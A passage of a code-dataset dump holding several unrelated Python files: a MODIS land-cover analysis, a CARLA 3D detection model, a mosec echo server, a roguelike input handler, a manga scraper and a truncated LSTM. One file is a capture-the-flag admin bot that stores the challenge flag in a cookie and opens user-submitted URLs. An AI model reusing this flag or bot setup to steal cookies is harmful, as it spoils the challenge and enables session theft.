two example pixles where one the LUC (e.g. DF) is changed\r\nand the other which is approximaltly close hasn't been changed. These pixles \r\nare arbitrary and just for show. \r\n-------------------------------------------------------------------\"\"\"\r\nprint('----------------- Working on the example (note this is just for the presentation and everything is arbitarary) -----------------\\n')\r\n# The year DF_2007 is just two aribitraty pixels to show the changes between changed and unchaneged pixels (for presentation purposes)\r\nDF_2007 = DF.sel(year=2007)\r\n# Find the coordinates of a random pixel where DF changed to herbaceuous\r\nx_changed, y_changed = find_coord(DF_2007, 4, 2)\r\n# some arbitarary pixle nearby with no change in DF class (~94%)\r\nx_not_changed = -121.6786\r\ny_not_changed = 56.2286\r\n\r\nlst_changed = lst.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_not_changed = lst.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(lst_changed, lst_not_changed, \"LST [C]\", outname=\"LST_DF_Herb_Example.png\")\r\n\r\nlst_lulc_changed = lst_lulc.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_nv_changed = lst_nv.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\n\r\nlst_diff_total_changed = lst_diff_total.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_diff_total_not_changed = lst_diff_total.sel(\r\n\tx=x_not_changed, y=y_not_changed, method=\"nearest\"\r\n)\r\nplot_example(\r\n\tlst_diff_total_changed,\r\n\tlst_diff_total_not_changed,\r\n\tr\"$\\Delta$ LST [C]\",\r\n\toutname=\"LST_DF_Herb_trend_Example.png\",\r\n)\r\n\r\nalbedo_changed = albedo.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nalbedo_not_changed = albedo.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(\r\n\talbedo_changed, albedo_not_changed, \"Albedo\", outname=\"Albedo_DF_Herb_Example.png\"\r\n)\r\n\r\nalbedo_diff_changed = albedo_diff.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nalbedo_diff_not_changed = albedo_diff.sel(\r\n\tx=x_not_changed, y=y_not_changed, method=\"nearest\"\r\n)\r\nplot_example(\r\n\talbedo_diff_changed,\r\n\talbedo_diff_not_changed,\r\n\tr\"$\\Delta$ Albedo\",\r\n\toutname=\"Albedo_DF_Herb_trend_Example.png\",\r\n)\r\n\r\nET_changed = ET.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nET_not_changed = ET.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(ET_changed, ET_not_changed, \"ET [mm/year]\", outname=\"ET.png\")\r\n\r\nEC_changed = EC.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nEC_not_changed = EC.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(EC_changed, EC_not_changed, \"EC [mm/year]\", outname=\"EC.png\")\r\n\r\nES_changed = ES.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nES_not_changed = ES.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(ES_changed, ES_not_changed, \"ES [mm/year]\", outname=\"ES.png\")\r\n\r\nEI_changed = EI.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nEI_not_changed = EI.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(EI_changed, EI_not_changed, \"EI [mm/year]\", outname=\"EI.png\")\r\n\r\nprint('----------------- All done! -----------------\\n')\r\n\r\n# ------------------------------ End of the script --------------------------------------------","sub_path":"Modis/Main_Analyses_Annual.py","file_name":"Main_Analyses_Annual.py","file_ext":"py","file_size_in_byte":42196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183802955","text":"import time\nimport torch\nimport torch.nn as nn\nimport hyperparams as hyp\nimport numpy as np\nimport os\n\nfrom model_base import Model\nfrom nets.featnet3D import FeatNet3D\nfrom nets.occnet import OccNet\nfrom nets.flownet import FlowNet\nfrom nets.viewnet import ViewNet\nfrom nets.detnet import DetNet\nfrom nets.embnet2D import EmbNet2D\nfrom nets.embnet3D import EmbNet3D\n\nimport torch.nn.functional as F\n\nimport vox_util\nimport utils_samp\nimport utils_geom\nimport utils_misc\nimport utils_improc\nimport utils_basic\nimport utils_track\nimport frozen_flow_net\nimport utils_eval\n\nfrom tensorboardX import SummaryWriter\nfrom backend import saverloader, inputs\nfrom torchvision import datasets, transforms\n\nnp.set_printoptions(precision=2)\nnp.random.seed(0)\nEPS = 1e-6\nMAX_QUEUE = 10 # how many items before the summaryWriter flushes\n\nclass CARLA_DET(Model):\n def initialize_model(self):\n print(\"------ INITIALIZING MODEL OBJECTS ------\")\n self.model = CarlaDetModel()\n if hyp.do_freeze_feat3D:\n self.model.featnet3D.eval()\n self.set_requires_grad(self.model.featnet3D, False)\n if hyp.do_freeze_det:\n self.model.detnet.eval()\n self.set_requires_grad(self.model.detnet, False)\n\n # def go(self):\n # self.start_time = time.time()\n # self.initialize_model()\n # print(\"------ Done creating models ------\")\n # if hyp.lr > 0:\n # self.optimizer = torch.optim.Adam(self.model.parameters(), lr=hyp.lr)\n # self.start_iter = saverloader.load_weights(self.model, self.optimizer)\n # print(\"------ Done loading weights ------\")\n # else:\n # self.start_iter = 0\n\n # set_nums = []\n # set_names = []\n # set_inputs = []\n # set_writers = []\n # set_log_freqs = []\n # set_do_backprops = []\n # set_dicts = []\n # set_loaders = []\n\n # for set_name in hyp.set_names:\n # if hyp.sets_to_run[set_name]:\n # set_nums.append(hyp.set_nums[set_name])\n # set_names.append(set_name)\n # set_inputs.append(self.all_inputs[set_name])\n # set_writers.append(SummaryWriter(self.log_dir + '/' + set_name, max_queue=MAX_QUEUE, flush_secs=60))\n # set_log_freqs.append(hyp.log_freqs[set_name])\n # set_do_backprops.append(hyp.sets_to_backprop[set_name])\n # set_dicts.append({})\n # set_loaders.append(iter(set_inputs[-1]))\n\n # for step in list(range(self.start_iter+1, hyp.max_iters+1)):\n # for i, (set_input) in enumerate(set_inputs):\n # if step % len(set_input) == 0: #restart after one epoch. Note this does nothing for the tfrecord loader\n # set_loaders[i] = iter(set_input)\n\n # for (set_num,\n # set_name,\n # set_input,\n # set_writer,\n # set_log_freq,\n # set_do_backprop,\n # set_dict,\n # set_loader\n # ) in zip(\n # set_nums,\n # set_names,\n # set_inputs,\n # set_writers,\n # set_log_freqs,\n # set_do_backprops,\n # set_dicts,\n # set_loaders\n # ): \n\n # log_this = np.mod(step, set_log_freq)==0\n # total_time, read_time, iter_time = 0.0, 0.0, 0.0\n\n # if log_this or set_do_backprop:\n \n # read_start_time = time.time()\n\n # feed, _ = next(set_loader)\n # feed_cuda = {}\n # for k in feed:\n # try:\n # feed_cuda[k] = feed[k].cuda(non_blocking=True)\n # except:\n # # some things are not tensors (e.g., filename)\n # feed_cuda[k] = feed[k]\n\n # # feed_cuda = next(iter(set_input))\n # read_time = time.time() - read_start_time\n \n # feed_cuda['writer'] = set_writer\n # feed_cuda['global_step'] = step\n # feed_cuda['set_num'] = set_num\n # feed_cuda['set_name'] = set_name\n\n # filename = feed_cuda['filename'][0]\n # # print('filename = %s' % filename)\n # tokens = filename.split('/')\n # filename = tokens[-1]\n # # print('new filename = %s' % filename)\n \n # iter_start_time = time.time()\n # if set_do_backprop:\n # self.model.train()\n # loss, results, returned_early = self.model(feed_cuda)\n # else:\n # self.model.eval()\n # with torch.no_grad():\n # loss, results, returned_early = self.model(feed_cuda)\n # loss_py = loss.cpu().item()\n \n # if (not returned_early) and (set_do_backprop) and (hyp.lr > 0):\n # self.optimizer.zero_grad()\n # loss.backward()\n # self.optimizer.step()\n # iter_time = time.time()-iter_start_time\n # total_time = time.time()-self.start_time\n\n # print(\"%s; [%4d/%4d]; ttime: %.0f (%.2f, %.2f); loss: %.3f (%s)\" % (hyp.name,\n # step,\n # hyp.max_iters,\n # total_time,\n # read_time,\n # iter_time,\n # loss_py,\n # set_name))\n \n # if np.mod(step, hyp.snap_freq) == 0 and hyp.lr > 0:\n # saverloader.save(self.model, self.checkpoint_dir, step, self.optimizer)\n\n # for writer in set_writers: #close writers to flush cache into file\n # writer.close()\n \n\nclass CarlaDetModel(nn.Module):\n def __init__(self):\n super(CarlaDetModel, self).__init__()\n \n self.device = torch.device(\"cuda\")\n\n self.include_image_summs = True\n \n if hyp.do_feat3D:\n self.featnet3D = FeatNet3D(in_dim=4)\n if hyp.do_det:\n self.detnet = DetNet()\n \n def prepare_common_tensors(self, feed):\n\n results = dict()\n \n self.summ_writer = utils_improc.Summ_writer(\n writer=feed['writer'],\n global_step=feed['global_step'],\n log_freq=feed['set_log_freq'],\n fps=8,\n just_gif=True)\n global_step = feed['global_step']\n\n self.B = feed[\"set_batch_size\"]\n self.S = feed[\"set_seqlen\"]\n self.set_name = feed['set_name']\n \n __p = lambda x: utils_basic.pack_seqdim(x, self.B)\n __u = lambda x: utils_basic.unpack_seqdim(x, self.B)\n\n self.H, self.W, self.V, self.N = hyp.H, hyp.W, hyp.V, hyp.N\n self.PH, self.PW = hyp.PH, hyp.PW\n\n # if self.set_name=='test':\n # self.Z, self.Y, self.X = hyp.Z_test, hyp.Y_test, hyp.X_test\n # elif self.set_name=='val':\n # self.Z, self.Y, self.X = hyp.Z_val, hyp.Y_val, hyp.X_val\n # else:\n self.Z, self.Y, self.X = hyp.Z, hyp.Y, hyp.X\n self.Z2, self.Y2, self.X2 = int(self.Z/2), int(self.Y/2), int(self.X/2)\n self.Z4, self.Y4, self.X4 = int(self.Z/4), int(self.Y/4), int(self.X/4)\n\n self.ZZ, self.ZY, self.ZX = hyp.ZZ, hyp.ZY, hyp.ZX\n self.pix_T_cams = feed[\"pix_T_cams\"]\n set_data_format = feed['set_data_format']\n self.S = feed[\"set_seqlen\"]\n \n\n self.origin_T_camRs = feed[\"origin_T_camRs\"]\n self.origin_T_camXs = feed[\"origin_T_camXs\"]\n\n self.camX0s_T_camXs = utils_geom.get_camM_T_camXs(self.origin_T_camXs, ind=0)\n self.camR0s_T_camRs = utils_geom.get_camM_T_camXs(self.origin_T_camRs, ind=0)\n self.camRs_T_camR0s = __u(__p(self.camR0s_T_camRs).inverse())\n self.camRs_T_camXs = __u(torch.matmul(__p(self.origin_T_camRs).inverse(), __p(self.origin_T_camXs)))\n self.camXs_T_camRs = __u(__p(self.camRs_T_camXs).inverse())\n\n self.xyz_camXs = feed[\"xyz_camXs\"]\n self.xyz_camX0s = __u(utils_geom.apply_4x4(__p(self.camX0s_T_camXs), __p(self.xyz_camXs)))\n \n all_ok = False\n num_tries = 0\n while not all_ok:\n scene_centroid_x = np.random.uniform(-8.0, 8.0)\n scene_centroid_y = np.random.uniform(-1.5, 3.0)\n scene_centroid_z = np.random.uniform(10.0, 26.0)\n scene_centroid = np.array([scene_centroid_x,\n scene_centroid_y,\n scene_centroid_z]).reshape([1, 3])\n self.scene_centroid = torch.from_numpy(scene_centroid).float().cuda()\n num_tries += 1\n all_ok = True\n self.vox_util = vox_util.Vox_util(self.Z, self.Y, self.X, self.set_name, scene_centroid=self.scene_centroid, assert_cube=True)\n # we want to ensure this gives us a few points inbound for each batch el\n inb = __u(self.vox_util.get_inbounds(__p(self.xyz_camX0s), self.Z4, self.Y4, self.X4, already_mem=False))\n num_inb = torch.sum(inb.float(), axis=2)\n if torch.min(num_inb) < 200:\n all_ok = False\n if num_tries > 100:\n return False\n self.vox_size_X = self.vox_util.default_vox_size_X\n self.vox_size_Y = self.vox_util.default_vox_size_Y\n self.vox_size_Z = self.vox_util.default_vox_size_Z\n self.summ_writer.summ_scalar('zoom_sampling/num_tries', float(num_tries))\n self.summ_writer.summ_scalar('zoom_sampling/num_inb', torch.mean(num_inb).cpu().item())\n \n _boxlist_camRs = feed[\"boxlists\"]\n _tidlist_s = feed[\"tidlists\"] # coordinate-less and plural\n _scorelist_s = feed[\"scorelists\"] # coordinate-less and plural\n _scorelist_s = __u(utils_misc.rescore_boxlist_with_inbound(\n utils_geom.eye_4x4(self.B*self.S),\n __p(_boxlist_camRs),\n __p(_tidlist_s),\n self.Z, self.Y, self.X,\n self.vox_util,\n only_cars=False, pad=2.0))\n boxlist_camRs_, tidlist_s_, scorelist_s_ = utils_misc.shuffle_valid_and_sink_invalid_boxes(\n __p(_boxlist_camRs), __p(_tidlist_s), __p(_scorelist_s))\n self.boxlist_camRs = __u(boxlist_camRs_)\n self.tidlist_s = __u(tidlist_s_)\n self.scorelist_s = __u(scorelist_s_)\n\n # for b in list(range(self.B)):\n # # if torch.sum(scorelist_s[b,0]) == 0:\n # if torch.sum(self.scorelist_s[:,0]) < (self.B/2): # not worth it; return early\n # return 0.0, None, True\n\n N = self.boxlist_camRs.shape[2]\n origin_T_camRs = self.origin_T_camRs.unsqueeze(2).repeat(1, 1, N, 1, 1)\n lrtlist_camRs_ = utils_misc.parse_boxes(__p(self.boxlist_camRs), __p(origin_T_camRs))\n lrtlist_camXs_ = utils_geom.apply_4x4_to_lrtlist(__p(self.camXs_T_camRs), lrtlist_camRs_)\n lrtlist_camX0s_ = utils_geom.apply_4x4_to_lrtlist(__p(self.camX0s_T_camXs), lrtlist_camXs_)\n scorelist_s_ = utils_misc.rescore_lrtlist_with_inbound(\n lrtlist_camX0s_, __p(self.tidlist_s), self.Z, self.Y, self.X, self.vox_util)\n self.lrtlist_camX0s = __u(lrtlist_camX0s_)\n\n return True # OK\n \n def run_detector(self, feed):\n total_loss = torch.tensor(0.0).cuda()\n __p = lambda x: utils_basic.pack_seqdim(x, self.B)\n __u = lambda x: utils_basic.unpack_seqdim(x, self.B)\n\n results = dict()\n\n self.rgb_camXs = feed['rgb_camXs']\n\n if hyp.do_feat3D:\n self.rgb_memXs = __u(self.vox_util.unproject_rgb_to_mem(\n __p(self.rgb_camXs), self.Z, self.Y, self.X, __p(self.pix_T_cams)))\n self.rgb_memX0s = self.vox_util.apply_4x4s_to_voxs(self.camX0s_T_camXs, self.rgb_memXs)\n self.occ_memX0s = __u(self.vox_util.voxelize_xyz(__p(self.xyz_camX0s), self.Z, self.Y, self.X))\n self.occ_memX0 = self.occ_memX0s[:,0]\n \n feat_memX0_input = torch.cat([\n self.occ_memX0s[:,0],\n self.rgb_memX0s[:,0]*self.occ_memX0s[:,0],\n ], dim=1)\n feat3D_loss, feat_memX0, valid_memX0 = self.featnet3D(\n feat_memX0_input,\n self.summ_writer,\n )\n total_loss += feat3D_loss\n self.summ_writer.summ_feat('3D_feats/feat_memX0_input', feat_memX0_input, pca=True)\n self.summ_writer.summ_feat('3D_feats/feat_memX0', feat_memX0, pca=True)\n \n if hyp.do_det:\n\n self.occ_memX0 = self.vox_util.voxelize_xyz(self.xyz_camX0s[:,0], self.Z, self.Y, self.X)\n self.rgb_memX0 = self.vox_util.unproject_rgb_to_mem(\n self.rgb_camXs[:,0], self.Z, self.Y, self.X, self.pix_T_cams[:,0])\n \n feat_memX0_input = torch.cat([\n self.occ_memX0,\n self.rgb_memX0*self.occ_memX0,\n ], dim=1)\n \n \n lrtlist_camX = self.lrtlist_camX0s[:, 0]\n axlrtlist_camX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_camX)\n lrtlist_memX = self.vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_camX, self.Z, self.Y, self.X)\n axlrtlist_memX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_memX)\n self.summ_writer.summ_lrtlist_bev(\n 'det/boxlist_g',\n self.occ_memX0[0:1],\n lrtlist_memX[0:1],\n torch.ones(1, 50).float().cuda(), # scores\n torch.ones(1, 50).long().cuda(), # tids\n self.vox_util, \n already_mem=True)\n self.summ_writer.summ_lrtlist_bev(\n 'det/axboxlist_g',\n self.occ_memX0[0:1],\n axlrtlist_memX[0:1],\n torch.ones(1, 50).float().cuda(), # scores\n torch.ones(1, 50).long().cuda(), # tids\n self.vox_util, \n already_mem=True)\n\n lrtlist_halfmemX = self.vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_camX, self.Z2, self.Y2, self.X2)\n # print('lrtlist_camR', lrtlist_camR[:, 0])\n # print('lrtlist_camR_check', utils_vox.apply_ref_T_mem_to_lrtlist(lrtlist_halfmemR, self.Z2, self.Y2, self.X2)[:, 0])\n axlrtlist_halfmemX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_halfmemX)\n # print('axlrtlist_halfmem_g', axlrtlist_halfmemR[:, 0])\n\n # axlrtlist_halfmemX_check = self.vox_util.apply_mem_T_ref_to_lrtlist(axlrtlist_camX, self.Z2, self.Y2,\n # self.X2)\n # print('axlrtlist_halfmemR_check', axlrtlist_halfmemR_check[:, 0])\n\n # feat_memX0 = torch.mean(feat_memX0s, dim=1)\n \n\n detect_loss, boxlist_halfmemX_e, scorelist_e, tidlist_e, pred_objectness, sco, ove = self.detnet(\n axlrtlist_halfmemX,\n self.scorelist_s[:, 0],\n feat_memX0_input,\n self.summ_writer)\n lrtlist_halfmemX_e = utils_geom.convert_boxlist_to_lrtlist(boxlist_halfmemX_e)\n # print('lenlist_halfmem_e', utils_geom.get_lenlist_from_lrtlist(lrtlist_halfmemR_e))\n lrtlist_camX_e = self.vox_util.apply_ref_T_mem_to_lrtlist(lrtlist_halfmemX_e, self.Z2, self.Y2, self.X2)\n # print('lenlist_cam_e', utils_geom.get_lenlist_from_lrtlist(lrtlist_camR_e))\n total_loss += detect_loss\n\n lrtlist_e = lrtlist_camX_e[0:1]\n lrtlist_g = lrtlist_camX[0:1]\n scorelist_e = scorelist_e[0:1]\n scorelist_g = self.scorelist_s[0:1, 0]\n lrtlist_e, lrtlist_g, scorelist_e, scorelist_g = utils_eval.drop_invalid_lrts(\n lrtlist_e, lrtlist_g, scorelist_e, scorelist_g)\n\n lenlist_e, _ = utils_geom.split_lrtlist(lrtlist_e)\n clist_e = utils_geom.get_clist_from_lrtlist(lrtlist_e)\n lenlist_g, _ = utils_geom.split_lrtlist(lrtlist_g)\n clist_g = utils_geom.get_clist_from_lrtlist(lrtlist_g)\n axlenlist_g, _ = utils_geom.split_lrtlist(axlrtlist_camX[0:1])\n axclist_g = utils_geom.get_clist_from_lrtlist(axlrtlist_camX[0:1])\n\n if self.include_image_summs:\n self.summ_writer.summ_lrtlist('obj/boxlist_e', self.rgb_camXs[:1, 0],\n lrtlist_e,\n scorelist_e,\n tidlist_e, self.pix_T_cams[:1, 0])\n _, Ne, _ = list(lrtlist_e.shape)\n _, Ng, _ = list(lrtlist_g.shape)\n # there may be no prediction or gt in the scene.\n if Ne > 0 and Ng > 0:\n lrtlist_e_ = lrtlist_e.unsqueeze(2).repeat(1, 1, Ng, 1).reshape(1, Ne * Ng, -1)\n lrtlist_g_ = lrtlist_g.unsqueeze(1).repeat(1, Ne, 1, 1).reshape(1, Ne * Ng, -1)\n ious = utils_geom.get_iou_from_corresponded_lrtlists(lrtlist_e_, lrtlist_g_)\n ious = ious.reshape(1, Ne, Ng)\n ious_e = torch.max(ious, dim=2)[0]\n self.summ_writer.summ_lrtlist('obj/boxlist', self.rgb_camXs[0:1, 0],\n torch.cat((lrtlist_e, lrtlist_g), dim=1),\n torch.cat((ious_e, ious_e.new_ones(1, Ng)), dim=1),\n torch.cat((ious_e.new_ones(1, Ne).long(),\n ious_e.new_ones(1, Ng).long() * 2), dim=1),\n self.pix_T_cams[0:1, 0])\n\n self.summ_writer.summ_lrtlist_bev('det/boxlist_e', self.occ_memX0[:1],\n lrtlist_e,\n scorelist_e,\n tidlist_e,\n self.vox_util, \n already_mem=False)\n # visualize the gt and prediction on occ\n self.summ_writer.summ_lrtlist_bev('det/boxlist', self.occ_memX0[0:1],\n torch.cat((lrtlist_e, lrtlist_g), dim=1),\n torch.cat((ious_e, ious_e.new_ones(1, Ng)), dim=1),\n torch.cat((ious_e.new_ones(1, Ne).long(),\n ious_e.new_ones(1, Ng).long() * 2), dim=1),\n self.vox_util, \n already_mem=False)\n\n ious = [0.3, 0.4, 0.5, 0.6, 0.7]\n maps = utils_eval.get_mAP_from_lrtlist(lrtlist_e, scorelist_e, lrtlist_g, ious)\n for ind, overlap in enumerate(ious):\n self.summ_writer.summ_scalar('ap/%.2f_iou' % overlap, maps[ind])\n\n\n \n # axboxlist_camRs = __u(utils_geom.inflate_to_axis_aligned_boxlist(__p(self.boxlist_camRs)))\n # axlrtlist_camRs = __u(utils_geom.convert_boxlist_to_lrtlist(__p(axboxlist_camRs)))\n # if self.include_image_summs:\n # self.summ_writer.summ_lrtlist('obj/axboxlist', self.rgb_camRs[:,0], axlrtlist_camRs[:,0],\n # self.scorelist_s[:,0], self.tidlist_s[:,0], self.pix_T_cams[:,0])\n\n # boxlist_memR = utils_vox.convert_boxlist_camR_to_memR(self.boxlist_camRs[:,0], self.Z2, self.Y2, self.X2)\n # axboxlist_memR = utils_geom.inflate_to_axis_aligned_boxlist(boxlist_memR)\n\n # featRs = utils_vox.apply_4x4s_to_voxs(self.camRs_T_camXs, feat_memXs)\n # featR = torch.mean(featRs, dim=1)\n\n # detect_loss, boxlist_memR_e, scorelist_e, tidlist_e, sco, ove = self.detnet(\n # axboxlist_memR,\n # self.scorelist_s[:,0],\n # featR,\n # self.summ_writer)\n # total_loss += detect_loss\n\n # boxlist_camR_e = utils_vox.convert_boxlist_memR_to_camR(boxlist_memR_e, self.Z2, self.Y2, self.X2)\n # lrtlist_camR_e = utils_geom.convert_boxlist_to_lrtlist(boxlist_camR_e)\n # if self.include_image_summs:\n # self.summ_writer.summ_lrtlist('obj/boxlist_e', self.rgb_camRs[:,0], lrtlist_camR_e,\n # scorelist_e, tidlist_e, self.pix_T_cams[:,0])\n\n # boxlist_e = boxlist_camR_e[0:1].detach().cpu().numpy()\n # boxlist_g = self.boxlist_camRs[0:1,0].detach().cpu().numpy()\n # scorelist_e = scorelist_e[0:1].detach().cpu().numpy()\n # scorelist_g = self.scorelist_s[0:1,0].detach().cpu().numpy()\n # boxlist_e, boxlist_g, scorelist_e, scorelist_g = utils_eval.drop_invalid_boxes(\n # boxlist_e, boxlist_g, scorelist_e, scorelist_g)\n\n # ious = [0.3, 0.4, 0.5, 0.6, 0.7]\n # maps = utils_eval.get_mAP(boxlist_e, scorelist_e, boxlist_g, ious)\n # for ind, overlap in enumerate(ious):\n # self.summ_writer.summ_scalar('ap/%.2f_iou' % overlap, maps[ind])\n \n self.summ_writer.summ_scalar('loss', total_loss.cpu().item())\n return total_loss, results, False\n \n \n def forward(self, feed):\n self.prepare_common_tensors(feed)\n return self.run_detector(feed)\n \n\n \n","sub_path":"pytorch_disco_recovery/model_carla_det.py","file_name":"model_carla_det.py","file_ext":"py","file_size_in_byte":22489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275180802","text":"import logging\nimport time\nfrom typing import List\n\nfrom pydantic import BaseModel\n\nfrom mosec import Server, Worker\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n \"%(asctime)s - %(process)d - %(levelname)s - %(filename)s:%(lineno)s - %(message)s\"\n)\nsh = logging.StreamHandler()\nsh.setFormatter(formatter)\nlogger.addHandler(sh)\n\n\nclass EchoReq(BaseModel):\n time: float\n\n\nclass EchoResp(BaseModel):\n msg: str\n\n\nclass Preprocess(Worker):\n def forward(self, data: EchoReq) -> float:\n logger.debug(f\"pre received {data}\")\n return data.time\n\n\nclass Inference(Worker):\n def forward(self, data: List[float]) -> List[float]:\n logger.info(f\"received batch size: {len(data)}\")\n time.sleep(sum(data) / len(data))\n return data\n\n\nclass Postprocess(Worker):\n def forward(self, data: float) -> EchoResp:\n logger.debug(f\"post received {data}\")\n return EchoResp(msg=f\"sleep {data} seconds\")\n\n\nif __name__ == \"__main__\":\n server = Server(EchoReq, EchoResp)\n server.append_worker(Preprocess, num=2)\n server.append_worker(Inference, max_batch_size=16)\n server.append_worker(Postprocess, num=2)\n server.run()\n","sub_path":"examples/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"324296625","text":"from selenium import webdriver\r\nimport requests\r\nimport time\r\n\r\nwhile True:\r\n r = requests.get(\"http://sunrin.kiminfo.kr:18777/onlybot.php\")\r\n if r.text != '0':\r\n driver = webdriver.Chrome('./chromedriver.exe')\r\n driver.implicitly_wait(3)\r\n driver.set_page_load_timeout(3)\r\n \r\n driver.get(\"http://sunrin.kiminfo.kr:18777/\")\r\n driver.add_cookie({\"name\": \"FLAG\", \"value\": \"SUNRIN{rp0rpOrpOrpOzZrp0rprOprOp}\"})\r\n try:\r\n driver.get(r.text)\r\n print(r.text)\r\n time.sleep(3)\r\n driver.quit()\r\n except:\r\n driver.quit()\r\n else:\r\n time.sleep(5)\r\n \r\n print(\"It's working. (RPO)\", flush=True)\r\n \r\n \r\n","sub_path":"2022/SUNRIN_CTF/HAPPY/bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"28887202","text":"import libtcodpy as tcod\nimport data\nimport engine\nimport render\n\n\ndef input():\n global recompute_field_of_view\n\n # key = libtcod.console_check_for_keypress() #real-time\n key = tcod.console_wait_for_keypress(True) # turn-based\n\n if key.vk == tcod.KEY_ENTER and key.lalt:\n # Alt+Enter: toggle fullscreen\n tcod.console_set_fullscreen(not tcod.console_is_fullscreen())\n\n elif key.vk == tcod.KEY_ESCAPE:\n return True # exit game\n\n # movement keys\n\n if tcod.console_is_key_pressed(tcod.KEY_UP):\n engine.frogue.move(0, -1)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_DOWN):\n engine.frogue.move(0, 1)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_LEFT):\n engine.frogue.move(-1, 0)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_RIGHT):\n engine.frogue.move(1, 0)\n render.recompute_field_of_view = True\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557259569","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom lxml.html import document_fromstring\nimport re\nimport json\nfrom helpers.exceptions import UrlParseError\n\ndomainUri = 'https://mangalib.me'\n\n\ndef get_main_content(url, get=None, post=None):\n return get('{}/{}'.format(domainUri, get_manga_name(url)))\n\n\ndef get_volumes(content=None, url=None, get=None, post=None):\n items = document_fromstring(content).cssselect('.vol_lst li h5 a')\n return [i.get('href') for i in items]\n\n\ndef get_archive_name(volume, index: int = None):\n name = re.search('\\\\.me/[^/]+/([^/]+/[^/]+)', volume)\n if not name:\n return 'vol_{}'.format(index)\n return name.groups()[0]\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n content = get(volume)\n items = re.search('var\\s+pages.?=.?(\\[{.+?\\}])', content)\n items = json.loads(items.groups()[0])\n href = re.search('[\\'\"](http[^\\'\"]+)[\\'\"].+\\\\.page_image', content)\n if not href:\n _ = re.search('([^/]+)/[^/]+/(\\d+)/.?(\\d+)', volume).groups()\n href = 'https://img1.mangalib.me/manga/{}/chapters/{}-{}/'.format(_[0],_[1],_[2],)\n else:\n href = href.groups()[0].strip('/') + '/'\n return [href + i['page_image'] for i in items]\n\n\ndef get_manga_name(url, get=None):\n name = re.search('\\\\.me/([^/]+)', url)\n if not name:\n raise UrlParseError()\n return name.groups()[0]\n","sub_path":"providers/mangalib_me.py","file_name":"mangalib_me.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"408795731","text":"import mxnet as mx\nimport numpy as np\nfrom collections import namedtuple\nimport time\nimport math\nimport custom_softmax\nfrom numpy_op_softmax import NumpySoftmax\nLSTMState = namedtuple('LSTMState', ['c','h'])\nLSTMParam = namedtuple('LSTMParam',['i2h_weight', 'i2h_bias',\n 'h2h_weight','h2h_bias'])\nLSTMModel = namedtuple('LSTMModel', ['rnn_exec', 'symbol','init_states','last_states','seq_data','seq_labels','seq_outputs','param_blocks'])\n\n\ndef lstm(num_hidden, indata, prev_state, param, seqidx, layeridx, dropout=0.):\n #LSTM Cell symbol\n if dropout>0.:\n indata=mx.sym.Dropout(data=indata, p=dropout)\n #Combine Wi, Wf, Wc, Wo into one i2h\n #Combine Ui, Uf, Uc, Uo into one h2h\n i2h=mx.sym.FullyConnected(data=indata, weight=param.i2h_weight, bias=param.i2h_bias, num_hidden=num_hidden*4, name='t%d_l%d_i2h'%(seqidx, layeridx) )\n h2h=mx.sym.FullyConnected(data=prev_state.h, weight=param.h2h_weight, bias=param.h2h_bias,num_hidden=num_hidden*4, name='t%d_l%d_h2h'%(seqidx, layeridx))\n\n gates=i2h+h2h\n\n slice_gates = mx.sym.SliceChannel(gates, num_outputs=4, name='t%d_l%d_slice'%(seqidx, layeridx))\n\n in_gate = mx.sym.Activation(slice_gates[0], act_type='sigmoid')\n forget_gate=mx.sym.Activation(slice_gates[1], act_type='sigmoid')\n out_gate=mx.sym.Activation(slice_gates[2], act_type='sigmoid')\n\n in_transform = mx.sym.Activation(slice_gates[3], act_type='tanh')\n\n next_c=(forget_gate* prev_state.c)+(in_gate*in_transform)\n next_h=out_gate*mx.sym.Activation(next_c, act_type='tanh')\n\n return LSTMState(c=next_c, h=next_h)\n\ndef lstm_unroll(num_lstm_layer, seq_len, input_size, num_hidden, num_embed, num_label, dropout=0.):\n embed_weight=mx.sym.Variable('embed_weight')\n cls_weight=mx.sym.Variable('cls_weight')\n cls_bias=mx.sym.Variable('cls_bias')\n\n 